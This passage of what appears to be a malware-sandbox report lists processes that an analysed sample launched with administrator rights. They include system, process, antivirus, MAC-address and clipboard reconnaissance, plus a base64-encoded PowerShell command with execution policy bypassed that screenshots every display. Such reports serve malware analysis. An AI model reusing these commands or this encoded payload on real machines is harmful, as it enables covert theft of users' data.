                                                                                                                                                                                                                                    Target ID:29
                                                                                                                                                                                                                                    Start time:13:44:08
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "systeminfo"
                                                                                                                                                                                                                                    Imagebase:0x7ff613350000
                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:30
                                                                                                                                                                                                                                    Start time:13:44:08
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                    Imagebase:0x7ff73cba0000
                                                                                                                                                                                                                                    File size:106'496 bytes
                                                                                                                                                                                                                                    MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:31
                                                                                                                                                                                                                                    Start time:13:44:08
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                                                                                                                                                                                                                    Imagebase:0x7ff65aee0000
                                                                                                                                                                                                                                    File size:576'000 bytes
                                                                                                                                                                                                                                    MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:32
                                                                                                                                                                                                                                    Start time:13:44:08
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:tree /A /F
                                                                                                                                                                                                                                    Imagebase:0x7ff6934b0000
                                                                                                                                                                                                                                    File size:20'992 bytes
                                                                                                                                                                                                                                    MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:33
                                                                                                                                                                                                                                    Start time:13:44:08
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:powershell Get-Clipboard
                                                                                                                                                                                                                                    Imagebase:0x7ff788560000
                                                                                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:34
                                                                                                                                                                                                                                    Start time:13:44:08
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:35
                                                                                                                                                                                                                                    Start time:13:44:08
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\systeminfo.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:systeminfo
                                                                                                                                                                                                                                    Imagebase:0x7ff6bf120000
                                                                                                                                                                                                                                    File size:110'080 bytes
                                                                                                                                                                                                                                    MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:37
                                                                                                                                                                                                                                    Start time:13:44:10
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                    Imagebase:0x7ff613350000
                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:38
                                                                                                                                                                                                                                    Start time:13:44:10
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                                                                                                                                                                                                                    Imagebase:0x7ff613350000
                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:39
                                                                                                                                                                                                                                    Start time:13:44:10
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:40
                                                                                                                                                                                                                                    Start time:13:44:10
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:41
                                                                                                                                                                                                                                    Start time:13:44:10
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:tree /A /F
                                                                                                                                                                                                                                    Imagebase:0x7ff6934b0000
                                                                                                                                                                                                                                    File size:20'992 bytes
                                                                                                                                                                                                                                    MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:42
                                                                                                                                                                                                                                    Start time:13:44:10
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                                                                                                                                                                                                    Imagebase:0x7ff788560000
                                                                                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:43
                                                                                                                                                                                                                                    Start time:13:44:12
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                    Imagebase:0x7ff613350000
                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:44
                                                                                                                                                                                                                                    Start time:13:44:12
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:45
                                                                                                                                                                                                                                    Start time:13:44:12
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:tree /A /F
                                                                                                                                                                                                                                    Imagebase:0x7ff6934b0000
                                                                                                                                                                                                                                    File size:20'992 bytes
                                                                                                                                                                                                                                    MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:46
                                                                                                                                                                                                                                    Start time:13:44:13
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "getmac"
                                                                                                                                                                                                                                    Imagebase:0x7ff613350000
                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:47
                                                                                                                                                                                                                                    Start time:13:44:13
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:48
                                                                                                                                                                                                                                    Start time:13:44:13
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bcdu5fii\bcdu5fii.cmdline"
                                                                                                                                                                                                                                    Imagebase:0x7ff64a840000
                                                                                                                                                                                                                                    File size:2'759'232 bytes
                                                                                                                                                                                                                                    MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:49
                                                                                                                                                                                                                                    Start time:13:44:13
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\getmac.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:getmac
                                                                                                                                                                                                                                    Imagebase:0x7ff637e50000
                                                                                                                                                                                                                                    File size:90'112 bytes
                                                                                                                                                                                                                                    MD5 hash:7D4B72DFF5B8E98DD1351A401E402C33
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:50
                                                                                                                                                                                                                                    Start time:13:44:13
                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                    Imagebase:0x7ff613350000
                                                                                                                                                                                                                                    File size:289'792 bytes
